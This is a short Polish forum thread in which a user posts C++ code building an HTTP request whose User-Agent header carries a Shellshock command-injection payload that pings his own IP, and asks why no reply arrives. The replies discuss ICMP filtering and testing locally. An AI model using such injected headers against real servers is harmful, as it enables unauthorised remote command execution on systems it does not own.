Pokaż wyniki 1 do 5 z 5

Temat: s.s.b.b

  1. #1
    ocb
    ocb jest offline
    Zarejestrowany
    May 2011
    Postów
    392

    Domyślnie s.s.b.b

    Czy ktoś testował może ten błąd w swoim środowisku przez cgi i mógł by mi potwierdzić czy zapytanie poniżej jest skonstruowane poprawnie?
    Na wiresharku zapytanie wydaje się poprawne, odpowiedź z mojej apki jest OK 200, jednak nie wracają do mnie pakiety icmp, przy czym jestem przekonany na 99% ze serwer nie jest załatany.
    Kod:
            std::string buf = "GET /cgi-bin/skrypt.cgi"; //znajdujący się na serwerze
    	buf.insert(buf.length(), " HTTP/1.1\r\n");
    	buf.insert(buf.length(), "Host: ");
    	buf.insert(buf.length(), serwer); //tablica z ip serwera
    	buf.insert(buf.length(), "\r\n");
            buf.insert(buf.length(), "User-Agent: () { :; }; /bin/ping -c 5 tu_jest_moje_ip\r\n");
    	buf.insert(buf.length(), "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n");
    	buf.insert(buf.length(), "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n");
    	buf.insert(buf.length(), "Accept-Encoding: gzip,deflate\r\n");
    	buf.insert(buf.length(), "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n");
    	buf.insert(buf.length(), "Keep-Alive: 300\r\n");
    	buf.insert(buf.length(), "Connection: keep-alive\r\n");
    	buf.insert(buf.length(), "\r\n");

  2. #2
    Zarejestrowany
    Oct 2008
    Skąd
    woj. Lubuskie. Dokładniej się nie da
    Postów
    405

    Domyślnie

    Odpowiedź 200 oznacza, że serwer przyjął żądanie. Zwykle wtedy zaczyna zwracać żądany plik. Jeżeli się wykonało, zwykle po prostu masz wycięte icmp po drodze.
    Czekaj czekaj... ty tam na prawdę podałeś swoje ip?
    Jeśli nie będziesz mieć pod górke, nigdy nie dojdziesz na szczyt.

  3. #3
    ocb
    ocb jest offline
    Zarejestrowany
    May 2011
    Postów
    392

    Domyślnie

    Cytat Napisał Piatkosia2010 Zobacz post
    Odpowiedź 200 oznacza, że serwer przyjął żądanie. Zwykle wtedy zaczyna zwracać żądany plik. Jeżeli się wykonało, zwykle po prostu masz wycięte icmp po drodze.
    Czekaj czekaj... ty tam na prawdę podałeś swoje ip?
    Icmp nie jest wyciętę, bo sam wyłączałem filtr. Tak podałem swoje ip. Może jednak było załatane. Nie mam żadnego hosta z odpowiednia konfiguracją żeby przetestować lokalnie...

  4. #4
    Zarejestrowany
    Oct 2008
    Skąd
    woj. Lubuskie. Dokładniej się nie da
    Postów
    405

    Domyślnie

    Cytat Napisał ocb Zobacz post
    Icmp nie jest wyciętę, bo sam wyłączałem filtr. Tak podałem swoje ip. Może jednak było załatane. Nie mam żadnego hosta z odpowiednia konfiguracją żeby przetestować lokalnie...
    To postaw?
    Jeśli nie będziesz mieć pod górke, nigdy nie dojdziesz na szczyt.

  5. #5
    ocb
    ocb jest offline
    Zarejestrowany
    May 2011
    Postów
    392

    Domyślnie

    Cytat Napisał Piatkosia2010 Zobacz post
    To postaw?
    dopisze na koniec todo

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52